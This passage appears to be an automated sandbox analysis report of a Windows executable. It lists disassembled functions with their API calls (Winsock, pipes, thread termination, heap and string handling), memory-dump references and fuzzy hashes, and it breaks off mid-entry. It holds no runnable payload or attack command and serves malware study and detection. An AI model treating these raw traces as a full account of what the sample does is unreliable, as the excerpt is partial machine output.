                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 38c64028de4d88909c768672189f59abada233414a674a50fa4310715a537916
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8C21A772A00219BFDF10DFA8DC84DBB73ACEB093A47548529F905DB2A1DA70DC479761
                                                                                                                                                                                                                                                                                        Function 00F68164 Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00F681A9
                                                                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00F681CF
                                                                                                                                                                                                                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 00F681D2
                                                                                                                                                                                                                                                                                        • SysAllocString.OLEAUT32 ref: 00F681F3
                                                                                                                                                                                                                                                                                        • SysFreeString.OLEAUT32 ref: 00F681FC
                                                                                                                                                                                                                                                                                        • StringFromGUID2.OLE32(?,?,00000028), ref: 00F68216
                                                                                                                                                                                                                                                                                        • SysAllocString.OLEAUT32(?), ref: 00F68224
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3761583154-0
                                                                                                                                                                                                                                                                                        • Opcode ID: f3c2866a350505052784df2c25266bfaf9540090674d00145d5a114b2170edc7
                                                                                                                                                                                                                                                                                        • Instruction ID: ee5e421976586d3912acdcf1881e22efb4e92022559fb4914c0ab332e1874cd8
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f3c2866a350505052784df2c25266bfaf9540090674d00145d5a114b2170edc7
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 65218672A00118BF9B10DFACDC99DAA77ECEB093647548229F905CB1A1DA74EC42E764
                                                                                                                                                                                                                                                                                        Function 00F70E79 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetStdHandle.KERNEL32(0000000C), ref: 00F70E99
                                                                                                                                                                                                                                                                                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00F70ED5
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CreateHandlePipe
                                                                                                                                                                                                                                                                                        • String ID: nul
                                                                                                                                                                                                                                                                                        • API String ID: 1424370930-2873401336
                                                                                                                                                                                                                                                                                        • Opcode ID: 0a0dc90265049b2966ec7a37c6cbfd1494ea3766810be45c8438eb98708db00d
                                                                                                                                                                                                                                                                                        • Instruction ID: 934c436ae21c253ef185b2f8986ef88359f2f7a45b51d1266de41cfb44de7bce
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0a0dc90265049b2966ec7a37c6cbfd1494ea3766810be45c8438eb98708db00d
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5B21307190030AEBDB309F25DC05A9A77A8FF54724F208A5AFCA9D72D0DB709940EB52
                                                                                                                                                                                                                                                                                        Function 00F70F4E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetStdHandle.KERNEL32(000000F6), ref: 00F70F6D
                                                                                                                                                                                                                                                                                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00F70FA8
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CreateHandlePipe
                                                                                                                                                                                                                                                                                        • String ID: nul
                                                                                                                                                                                                                                                                                        • API String ID: 1424370930-2873401336
                                                                                                                                                                                                                                                                                        • Opcode ID: a0eb06f753399c23edfde8fb5b08b2d938ae894f66928dad04e813b93c34e8b1
                                                                                                                                                                                                                                                                                        • Instruction ID: b54b63ea9ee901917878eb380949abcadabec7be792574ad989af1be19972dac
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a0eb06f753399c23edfde8fb5b08b2d938ae894f66928dad04e813b93c34e8b1
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0621837590034ADBEB309F689C05A9A77A8BF55730F204A1BF8A5D32D4DB709884FB52
                                                                                                                                                                                                                                                                                        Function 00F94B4B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F07873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00F078B1
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F07873: GetStockObject.GDI32(00000011), ref: 00F078C5
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F07873: SendMessageW.USER32(00000000,00000030,00000000), ref: 00F078CF
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00F94BB0
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00F94BBD
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00F94BC8
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00F94BD7
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00F94BE3
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                                                                                                                                                                                        • String ID: Msctls_Progress32
                                                                                                                                                                                                                                                                                        • API String ID: 1025951953-3636473452
                                                                                                                                                                                                                                                                                        • Opcode ID: 43f93707b6cd8f94e61fad477deb6a92a5593967582bbeabfe19e8ec8b3f9c04
                                                                                                                                                                                                                                                                                        • Instruction ID: 61226cea11b3a0a86659fd69724fe5ca37043982a6b0882595e5247e267ec99b
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 43f93707b6cd8f94e61fad477deb6a92a5593967582bbeabfe19e8ec8b3f9c04
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DD1193B254021DBEEF119FA5CC85EE77F9DEF487A8F014111B618A2090CA76DC21EBA0
                                                                                                                                                                                                                                                                                        Function 00F3DB5F Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F3DB23: _free.LIBCMT ref: 00F3DB4C
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00F3DBAD
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F32D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00F3DB51,00FD1DC4,00000000,00FD1DC4,00000000,?,00F3DB78,00FD1DC4,00000007,00FD1DC4,?,00F3DF75,00FD1DC4), ref: 00F32D4E
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F32D38: GetLastError.KERNEL32(00FD1DC4,?,00F3DB51,00FD1DC4,00000000,00FD1DC4,00000000,?,00F3DB78,00FD1DC4,00000007,00FD1DC4,?,00F3DF75,00FD1DC4,00FD1DC4), ref: 00F32D60
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00F3DBB8
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00F3DBC3
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00F3DC17
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00F3DC22
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00F3DC2D
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00F3DC38
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 98b13fc91f4fe31fecb0273d364a71dd69e1171f55120a532e903f65f4669862
                                                                                                                                                                                                                                                                                        • Instruction ID: bd86862d34fdf926db148ec929a586fc8166e484ab70bcf04f24004c7ea45a5f
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 98b13fc91f4fe31fecb0273d364a71dd69e1171f55120a532e903f65f4669862
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F3116072941B04BAD620BBB0EC47FCBF7DCAF44720F410C19B299AA252DB7DB504A760
                                                                                                                                                                                                                                                                                        Function 00F6E30E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00F6E328
                                                                                                                                                                                                                                                                                        • LoadStringW.USER32(00000000), ref: 00F6E32F
                                                                                                                                                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00F6E345
                                                                                                                                                                                                                                                                                        • LoadStringW.USER32(00000000), ref: 00F6E34C
                                                                                                                                                                                                                                                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00F6E390
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        • %s (%d) : ==> %s: %s %s, xrefs: 00F6E36D
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: HandleLoadModuleString$Message
                                                                                                                                                                                                                                                                                        • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                                                                                                                                                                                        • API String ID: 4072794657-3128320259
                                                                                                                                                                                                                                                                                        • Opcode ID: 425407b48b97c649a5f2d51c1079c41ab429b0dd70ff0a1a282b410f6fa36e18
                                                                                                                                                                                                                                                                                        • Instruction ID: 47a33ac69e289dfda3b2bf74aa387c08bfb2763e2a568bd891fd80f174f64eaf
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 425407b48b97c649a5f2d51c1079c41ab429b0dd70ff0a1a282b410f6fa36e18
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0E0112F790020C7FE711A7A4DD89EE6776CD708301F104596B746E6041E6749E84AF75
                                                                                                                                                                                                                                                                                        Function 00F71312 Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • InterlockedExchange.KERNEL32(?,?), ref: 00F71322
                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(00000000,?), ref: 00F71334
                                                                                                                                                                                                                                                                                        • TerminateThread.KERNEL32(00000000,000001F6), ref: 00F71342
                                                                                                                                                                                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00F71350
                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00F7135F
                                                                                                                                                                                                                                                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 00F7136F
                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(00000000), ref: 00F71376
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3495660284-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 68778e84f105c5bdbd2241d404ca1d28b0dd2cbb960fae64013c82a3ea7ec20b
                                                                                                                                                                                                                                                                                        • Instruction ID: 50375e3834eef965c6a68a7657f261aeb02715b0f3868e5721d033052b3084ce
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 68778e84f105c5bdbd2241d404ca1d28b0dd2cbb960fae64013c82a3ea7ec20b
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 45F0EC32842616BBD7411F54EE89BD6BB39FF04316F901123F101918A0877594B5EF91
                                                                                                                                                                                                                                                                                        Function 00F826BD Relevance: 9.3, APIs: 6, Instructions: 298networkCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00F8281D
                                                                                                                                                                                                                                                                                        • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00F8283E
                                                                                                                                                                                                                                                                                        • WSAGetLastError.WSOCK32 ref: 00F8284F
                                                                                                                                                                                                                                                                                        • htons.WSOCK32(?,?,?,?,?), ref: 00F82938
                                                                                                                                                                                                                                                                                        • inet_ntoa.WSOCK32(?), ref: 00F828E9
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F6433E: _strlen.LIBCMT ref: 00F64348
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F83C81: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,00F7F669), ref: 00F83C9D
                                                                                                                                                                                                                                                                                        • _strlen.LIBCMT ref: 00F82992
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3203458085-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 9d69bdfac75fa5ae0151d6296f2f7a60f15c18e580b87e1c5568d837802c1bdb
                                                                                                                                                                                                                                                                                        • Instruction ID: 6e152f87cf168591a0eac97078323719402f99bbb144904f0e30df39a9d876b0
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9d69bdfac75fa5ae0151d6296f2f7a60f15c18e580b87e1c5568d837802c1bdb
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5EB1C135604301AFD324EF24CC85FAABBA5AF84328F54854CF4564B2E2DB35ED45EB91
                                                                                                                                                                                                                                                                                        Function 00F30527 Relevance: 9.3, APIs: 6, Instructions: 269COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • __allrem.LIBCMT ref: 00F3042A
                                                                                                                                                                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F30446
                                                                                                                                                                                                                                                                                        • __allrem.LIBCMT ref: 00F3045D
                                                                                                                                                                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F3047B
                                                                                                                                                                                                                                                                                        • __allrem.LIBCMT ref: 00F30492
                                                                                                                                                                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F304B0
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1992179935-0
                                                                                                                                                                                                                                                                                        • Opcode ID: f879b393e65d4db2631db90962c4ab5633f4520d067d5efed2ccc62c0ef88ee5
                                                                                                                                                                                                                                                                                        • Instruction ID: 23f572ff86a3ca6860334aab012c8a6dfe9e30df8265ee5b0d258bbb14e31cfb
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f879b393e65d4db2631db90962c4ab5633f4520d067d5efed2ccc62c0ef88ee5
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F081E972A007069BE724EF68CC61B6A73A8AF44334F24413BF511D7681EF74DA00A794
                                                                                                                                                                                                                                                                                        Function 00F36571 Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00F28649,00F28649,?,?,?,00F367C2,00000001,00000001,8BE85006), ref: 00F365CB
                                                                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00F367C2,00000001,00000001,8BE85006,?,?,?), ref: 00F36651
                                                                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00F3674B
                                                                                                                                                                                                                                                                                        • __freea.LIBCMT ref: 00F36758
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F33B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00F26A79,?,0000015D,?,?,?,?,00F285B0,000000FF,00000000,?,?), ref: 00F33BC5
                                                                                                                                                                                                                                                                                        • __freea.LIBCMT ref: 00F36761
                                                                                                                                                                                                                                                                                        • __freea.LIBCMT ref: 00F36786
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1414292761-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 546df30695351bc390c51d93e7e46c1ab50e2b58d6e8f4bccf8a0cf7fe90062c
                                                                                                                                                                                                                                                                                        • Instruction ID: cce1a3b035d5276d3e66ceef912e5a9b9c3fbbe8cf58abc4c5c598c3f9200496
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 546df30695351bc390c51d93e7e46c1ab50e2b58d6e8f4bccf8a0cf7fe90062c
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8451E372A10216BFEB258F64CC85EBF77AAEB40774F648669FD04D6140EF34DC50A6A0
                                                                                                                                                                                                                                                                                        Function 00F8C63B Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F0B329: _wcslen.LIBCMT ref: 00F0B333
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F8D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F8C10E,?,?), ref: 00F8D415
